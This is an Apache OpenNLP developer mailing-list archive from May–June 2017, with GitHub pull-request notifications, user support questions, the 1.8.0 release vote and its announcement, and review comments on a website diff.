> 2017-06-05 15:37:35 INFO  Trainer:192 - java.lang.IllegalStateException:
> Missing serializer for postagger.bin
>
> Do i have to change the extension of the file?
>
> Thanks
>


[GitHub] opennlp pull request #226: OPENNLP-1088: Reduce fork count for eval tests

2017-06-06 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/226


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #225: OPENNLP-1087: Add convenience methods to load fro...

2017-05-31 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/225

OPENNLP-1087: Add convenience methods to load from Path

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1087

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/225.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #225


commit b777a3f523a64b4ca6858803a7299fe6e290553f
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-31T22:17:57Z

OPENNLP-1087: Add convenience methods to load from Path




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #224: OPENNLP-1085: Add methods to write model to File ...

2017-05-31 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/224

OPENNLP-1085: Add methods to write model to File or Path

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1085

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/224.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #224


commit 93399d8657b884ad48e478fa34584de62e08dab2
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-31T21:31:32Z

OPENNLP-1085: Add methods to write model to File or Path




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #223: OPENNLP-1086: Refactor the Data Indexers

2017-05-30 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/223

OPENNLP-1086: Refactor the Data Indexers

The following has been done:
- Use Java 8 streams where it makes sense
- Deduplicate the index method and have one common one
- Avoid having all predicate Strings twice in memory for cutoff filter

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1086

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/223.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #223


commit a9c65ccfda3a88384da79f5f906b0b98b04d90c0
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-30T09:21:14Z

OPENNLP-1086: Refactor the Data Indexers

The following has been done:
- Use Java 8 streams where it makes sense
- Deduplicate the index method and have one common one
- Avoid having all predicate Strings twice in memory for cutoff filter




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #216: OPENNLP-1076: Add validation of spans to Sentence...

2017-05-24 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/216

OPENNLP-1076: Add validation of spans to SentenceSample

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1076

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/216.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #216


commit d378c0656ff2374a867abe0383aa841275a47d8d
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-24T10:10:37Z

OPENNLP-1076: Add validation of spans to SentenceSample




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #215: OPENNLP-1075 Add streams for sentence and token s...

2017-05-23 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/215

OPENNLP-1075 Add streams for sentence and token samples for conllu

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1075

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/215.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #215


commit 7c9cdba80293ec34e41b8f42bff5d7bbca84333c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-23T15:28:33Z

OPENNLP-1075 Add streams for sentence and token samples for conllu




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: opennlp.tools.coref.mention.JWNLDictionary;

2017-05-23 Thread Joern Kottmann
The coref component was removed from OpenNLP quite some time ago because we
didn't have a maintainer anymore for it.
The JWNLDictionary class was part of that removal, you can still find the
code in the OpenNLP Sandbox:
https://github.com/apache/opennlp-sandbox/blob/master/opennlp-coref/src/main/java/opennlp/tools/coref/mention/JWNLDictionary.java

The code is licensed under AL 2.0 and it should be possible to just include
it as is in your project.

Jörn

On Tue, May 23, 2017 at 11:24 AM, Serano Colameo  wrote:

> Hi,
>
> I just discovered that opennlp.tools.coref.mention.JWNLDictionary in
> version opennlp-tools 1.7.2 was somehow removed or moved somewhere else.
>
> The reason is that I need to integrated the WordNet dictionary in my
> system.
>
> Can you please help?
>
> Thanks
> Serano
>
>


[GitHub] opennlp pull request #214: OPENNLP-1074: Reduce visibility of eval methods

2017-05-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/214

OPENNLP-1074: Reduce visibility of eval methods

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1074

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/214.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #214


commit 226612f48bb40eb55ef5814ab9ee995fe9b30f71
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-22T14:05:33Z

OPENNLP-1074: Reduce visibility of eval methods




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #14: OPENNLP-1067: Use variables in jbake.properti...

2017-05-19 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/14#discussion_r117455933
  
--- Diff: src/main/jbake/content/maven-dependency.ad ---
@@ -35,59 +34,75 @@ all transient dependencies are resolved automatically.
 
 To use the OpenNLP Tools define the following dependency:
 
-
-
-  org.apache.opennlp
-  opennlp-tools
-  1.7.2
-
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-tools
+  {opennlp_version}
+
+
 
 ## OpenNLP UIMA Annotators Dependency
 
 To use the OpenNLP UIMA Annotators define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-uima
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-uima
+  {opennlp_version}
+
+
 
 ## OpenNLP Morfologik AddOn Dependency
 
 To use the OpenNLP Morfologik-Addon define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-morfologik-addon
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-morfologik-addon
+  {opennlp_version}
+
+
 
 ## OpenNLP Brat Annotator Dependency
 
 To use the OpenNLP UIMA Annotators define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-brat-annotator
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-brat-annotator
+  {opennlp_version}
+
+
 
 ## OpenNLP Tools SNAPSHOT Dependency
 
 To use the current trunk version define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-tools
-  1.7.3-SNAPSHOT
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-tools
+  {opennlp_next_version}
+
+
 
 The SNAPSHOT dependency requires the following repository:
 
-
-  
-apache opennlp snapshot
-
https://repository.apache.org/content/repositories/snapshots/
-  
-
\ No newline at end of file
+[source,xml,indent=0,subs=attributes+]
+
+
+  
+apache opennlp snapshot
+
https://repository.apache.org/content/repositories/snapshots/
+  
+
+
--- End diff --

Add a new line here, files are supposed to end with new line.


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #14: OPENNLP-1067: Use variables in jbake.properti...

2017-05-19 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/14#discussion_r117455817
  
--- Diff: src/main/jbake/content/docs/index.ad ---
@@ -25,12 +25,12 @@
 There exists a manual and Javadoc API documentation for Apache OpenNLP. 
The manual
 explains how the various OpenNLP components can be used and trained.
 
-### Apache OpenNLP 1.8.0 documentation
+### Apache OpenNLP {opennlp_version} documentation
 
-* link:/docs/1.8.0/manual/opennlp.html[Apache OpenNLP Manual]
-* link:/docs/1.8.0/apidocs/opennlp-tools/index.html[Apache OpenNLP Tools 
Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-uima/index.html[Apache OpenNLP UIMA 
Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-brat-annotator/index.html[Apache 
OpenNLP BRAT Annotator Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-morfologik-addon/index.html[Apache 
OpenNLP Morfologik Addon Javadoc]
+* link:/docs/1.7.2/manual/opennlp.html[Apache OpenNLP Manual]
--- End diff --

Should this be 1.8.0


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[ANNOUNCE] Apache OpenNLP 1.8.0 Release

2017-05-19 Thread Joern Kottmann
The Apache OpenNLP team is pleased to announce the release of version 1.8.0
of Apache OpenNLP.

The Apache OpenNLP library is a machine learning based toolkit for the
processing of natural language text.

It supports the most common NLP tasks, such as tokenization, sentence
segmentation, part-of-speech tagging, named entity extraction, chunking,
parsing, and coreference resolution.

The OpenNLP 1.8.0 binary and source distributions are available for
download from our download page:
*https://opennlp.apache.org/download.html
*

The OpenNLP library is distributed by Maven Central as well. See the Maven
Dependency page for more details:
https://opennlp.apache.org/maven-dependency.html

Java 1.8 is required to run OpenNLP Maven 3.3.9 is required for building it
Building from the Source Distribution.

To build everything execute the following command in the root folder: mvn
clean install

The results of the build will be placed in:
opennlp-distr/target/apache-opennlp-1.8.0-bin.tar-gz (or .zip)

What's new in Apache OpenNLP 1.8.0

This release introduces many new features, improvements and bug fixes. The
API
has been improved for a better consistency and many deprecated methods were
removed. Java 1.8 is required.

Additionally the release contains the following noteworthy changes:

- POS Tagger context generator now supports feature generation XML
- Add a Name Finder feature generator that adds POS Tag features
- Add CONLL-U format support
- Improve default Name Finder settings
- TokenNameFinderEvaluator CLI now support nameTypes argument
- Stupid backoff is now the default in NGramLanguageModel
- Language codes now are ISO 639-3 compliant
- Add many unit tests
- Distribution package now includes example parameters file
- Now prefix and suffix feature generators are configurable
- Remove API in Document Categorizer for user specified tokenizer
- Learnable lemmatizer now returns all possible lemmas for a given word and
pos tag
- Lemmatizer API backward compatibility break: no need to encode/decode
lemmas anymore, now LemmatizerME lemmatize method returns the actual lemma
- Add stemmer, detokenizer and sentence detection abbreviations for Irish
- Chunker SequenceValidator signature changed to allow access to both token
and POS tag

A detailed list of the issues related to this release can be found in the
release
notes.

Thanks again to all contributors and committers for their help.


[GitHub] opennlp pull request #196: [1.8.1] OPENNLP-1054: Remove deprecated Heap and ...

2017-05-19 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/196


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #212: OPENNLP-1068: Use current version to generate cha...

2017-05-19 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/212

OPENNLP-1068: Use current version to generate changes list

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1068

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/212.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #212


commit c9d60b9c070ac9ea7ef77e7282053b7ac392b37c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-19T09:14:02Z

OPENNLP-1068: Use current version to generate changes list




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #12: Update site for 1.8.0 release

2017-05-18 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp-site/pull/12

Update site for 1.8.0 release



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp-site 180_release

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp-site/pull/12.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #12


commit d219b3c4ec9e03cda0f4b968783525f321fab03f
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-18T22:03:58Z

Update site for 1.8.0 release




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-18 Thread Joern Kottmann
The vote passes, only +1 votes were receive:
+1 Bruno
+1 Tommaso
+1 William
+1 Jörn
+1 Jeff
+1 Daniel
+1 Richard
+1 Joey
+1 Suneel
+1 Rodrigo

Thanks for voting!

Jörn

On Wed, 2017-05-17 at 23:48 +0200, Joern Kottmann wrote:
> The Apache OpenNLP PMC would like to call for a Vote on Apache
> OpenNLP
> 1.8.0 Release Candidate 3. 
> 
> The RC 3 distributables can be downloaded from here:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1
> 01
> 3/org/apache/opennlp/opennlp-distr/1.8.0/
> 
> The release was made from the Apache OpenNLP 1.8.0 tag at
> https://github.com/apache/opennlp/tree/opennlp-1.8.0
>  
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1
> 01
> 3
>  
> The release was made using the OpenNLP release process, documented on
> the Wiki here:
> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>  
> The release contains quite some changes, please refer to the
> contained
> issue list for details.
>  
> Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> vote is open for at least the next 72 hours.
>  
> Only votes from OpenNLP PMC are binding, but folks are welcome to
> check
> the release candidate and voice their approval or disapproval. The
> vote
> passes if at least three binding +1 votes are cast.
>  
> [ ] +1 Release the packages as Apache OpenNLP 1.8.0
> [ ] -1 Do not release the packages because...
>  
>  
> Thanks!
> 
> Jörn
> 
> P.S. Here is my +1.


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-18 Thread Joern Kottmann
@Richard, it would be nice if you could vote as well so we know that what
we have now in RC 3 works for you.

Jörn

On Thu, May 18, 2017 at 4:56 PM, William Colen <william.co...@gmail.com>
wrote:

> +1 (binding)
>
> Successfully executed complete evaluation tests in source deliverable.
> Tried it with DKPro and after updating the Lemmatizer and Chunker usage
> there was two test failures that we could trace back to issues fixed in
> OPENNLP-125 and OPENNLP-989 that would affect evaluation results.
>
>
>
> 2017-05-18 10:08 GMT-03:00 Tommaso Teofili <tommaso.teof...@gmail.com>:
>
> > +1 (binding)
> >
> > Regards,
> > Tommaso
> >
> > p.s.:
> >
> > +1 also to Bruno's side comments
> >
> > Il giorno gio 18 mag 2017 alle ore 12:43 Bruno P. Kinoshita
> > <brunodepau...@yahoo.com.br.invalid> ha scritto:
> >
> > >
> > > [ X ] +1 Release the packages as Apache OpenNLP 1.8.0
> > >
> > > Not binding
> > >
> > > Side note: would be nice later to start fixing some issues found via
> > > FindBugs. Running `mvn clean findbugs:findbugs findbugs:gui` shows
> > several
> > > errors, some seem important, like using equals() for array objects
> (which
> > > will always be false).
> > >
> > > See
> > >
> > >
> > > https://github.com/apache/opennlp/blob/73c8e5b9d8e055fefb53f7f3c2487d
> > 05c9788c6a/opennlp-tools/src/main/java/opennlp/tools/util/
> > TokenTag.java#L85
> > >
> > > And
> > >
> > >
> > >
> > > https://github.com/apache/opennlp/blob/73c8e5b9d8e055fefb53f7f3c2487d
> > 05c9788c6a/opennlp-tools/src/main/java/opennlp/tools/util/featuregen/
> > POSTaggerNameFeatureGenerator.java#L59
> > > Plus other NullPointerException's that can be prevented, and other
> minor
> > > issues. Not blockers for the release though, IMO.
> > >
> > > Cheers
> > > Bruno
> > >
> > >
> > > 
> > > From: Joern Kottmann <kottm...@gmail.com>
> > > To: dev@opennlp.apache.org
> > > Sent: Thursday, 18 May 2017 9:49 AM
> > > Subject: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3
> > >
> > >
> > >
> > > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > >
> > > 1.8.0 Release Candidate 3.
> > >
> > >
> > > The RC 3 distributables can be downloaded from here:
> > >
> > > https://repository.apache.org/content/repositories/
> orgapacheopennlp-101
> > >
> > > 3/org/apache/opennlp/opennlp-distr/1.8.0/
> > >
> > >
> > > The release was made from the Apache OpenNLP 1.8.0 tag at
> > >
> > > https://github.com/apache/opennlp/tree/opennlp-1.8.0
> > >
> > >
> > >
> > > To use it in a maven build set the version for opennlp-tools or
> > >
> > > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> > >
> > > file:
> > >
> > > https://repository.apache.org/content/repositories/
> orgapacheopennlp-101
> > >
> > > 3
> > >
> > >
> > >
> > > The release was made using the OpenNLP release process, documented on
> > >
> > > the Wiki here:
> > >
> > > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
> > >
> > >
> > >
> > > The release contains quite some changes, please refer to the contained
> > >
> > > issue list for details.
> > >
> > >
> > >
> > > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> > >
> > > vote is open for at least the next 72 hours.
> > >
> > >
> > >
> > > Only votes from OpenNLP PMC are binding, but folks are welcome to check
> > >
> > > the release candidate and voice their approval or disapproval. The vote
> > >
> > > passes if at least three binding +1 votes are cast.
> > >
> > >
> > >
> > > [ ] +1 Release the packages as Apache OpenNLP 1.8.0
> > >
> > > [ ] -1 Do not release the packages because...
> > >
> > >
> > >
> > >
> > >
> > > Thanks!
> > >
> > >
> > > Jörn
> > >
> > >
> > > P.S. Here is my +1.
> > >
> >
>


[GitHub] opennlp pull request #211: Add support to train on leipzig

2017-05-18 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/211

Add support to train on leipzig

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp add_leipzig

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/211.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #211






---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: CoReference

2017-05-18 Thread Joern Kottmann
That part is not maintained currently, if you would like to work on it you
are more than welcome to get this back into opennlp-tools.

Jörn

On Thu, May 18, 2017 at 4:37 PM, Damiano Porta <damianopo...@gmail.com>
wrote:

> Do you also have an example? :)
>
> Il 18 mag 2017 16:35, "Damiano Porta" <damianopo...@gmail.com> ha scritto:
>
> > Oh my wrong. Pardon.
> > Do we have accuracy statistics?
> >
> > Il 18 mag 2017 14:59, "Joern Kottmann" <kottm...@gmail.com> ha scritto:
> >
> >> This is for linking entities in one document, e.g. first name mention
> to a
> >> full name mention, or to he, she, it.
> >>
> >> Jörn
> >>
